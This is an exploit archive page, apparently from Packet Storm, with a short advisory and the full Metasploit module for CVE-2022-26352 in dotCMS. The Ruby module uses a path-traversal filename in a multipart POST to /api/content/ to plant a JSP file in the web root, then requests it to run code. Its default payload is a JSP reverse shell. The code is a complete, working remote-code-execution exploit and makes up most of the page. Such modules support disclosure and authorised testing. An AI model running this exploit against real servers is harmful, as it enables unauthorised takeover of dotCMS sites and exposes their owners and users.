what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

dotCMS Shell Upload

dotCMS Shell Upload
Posted Jun 2, 2022
Authored by jheysel-r7, Hussein Daher, Shubham Shah | Site metasploit.com

When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the file down in a temporary directory. In the case of this vulnerability, dotCMS does not sanitize the filename passed in via the multipart request header and thus does not sanitize the temporary file's name. This allows an attacker to use a specially crafted request to POST files to dotCMS via the ContentResource API that gets written outside of the dotCMS temporary directory. In the case of this exploit, an attacker can upload a specially crafted .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.

tags | exploit, remote, root, code execution
advisories | CVE-2022-26352
SHA-256 | 6278f9faf70f24f5e2ce7692ddce577df263982c2d46d57858bd869409412d14

dotCMS Shell Upload

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'DotCMS RCE via Arbitrary File Upload.',
'Description' => %q{
When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the
file down in a temp directory. In the case of this vulnerability, dotCMS does not sanitize the filename
passed in via the multipart request header and thus does not sanitize the temp file's name. This allows a
specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content) that get
written outside of the dotCMS temp directory. In the case of this exploit, an attacker can upload a special
.jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.
},
'Author' => [
'Shubham Shah', # Discovery and analysis
'Hussein Daher', # Discovery and analysis
'jheysel-r7' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2022-26352'],
['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']
],
'Privileged' => false,
'Platform' => %w[linux win],
'Targets' => [
[
'Java Linux',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
],
[
'Java Windows',
{
'Arch' => ARCH_JAVA,
'Platform' => 'win'
}
]
],
'DisclosureDate' => '2022-05-03',
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true,
'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)

register_options([
Opt::RPORT(8443),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
test_content = Rex::Text.rand_text_alpha(10)
test_file = "#{test_content}.jsp"
test_path = "../../#{test_file}"
uuid = Faker::Internet.uuid

jsp = <<~EOS
<%@ page import=\"java.io.File\" %>
<%
File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");
jsp.delete();
%>
#{uuid}
EOS

vars_form_data = [
{
'name' => 'name',
'data' => jsp,
'encoding' => nil,
'filename' => test_path,
'mime_type' => 'text/plain'
}
]

send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/content/'),
'vars_form_data' => vars_form_data
)

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, test_file.to_s)
)

if res && res.body.include?(uuid)
return Exploit::CheckCode::Vulnerable
end

Exploit::CheckCode::Safe
end

def write_jsp_payload
jsp_path = "../../#{jsp_filename}"
print_status('Writing JSP payload')
vars_form_data = [
{
'name' => 'name',
'data' => payload.encoded,
'encoding' => nil,
'filename' => jsp_path,
'mime_type' => 'text/plain'
}
]

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/content/'),
'vars_form_data' => vars_form_data
)

unless res&.code == 500
fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')
end

register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")
print_good('Successfully wrote JSP payload')
end

def execute_jsp_payload
jsp_uri = normalize_uri(target_uri.path, jsp_filename)
print_status('Executing JSP payload')
res = send_request_cgi(
'method' => 'GET',
'uri' => jsp_uri
)

unless res&.code == 200
fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')
end
print_good('Successfully executed JSP payload')
end

def exploit
write_jsp_payload
execute_jsp_payload
end

def jsp_filename
@jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"
end
end
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close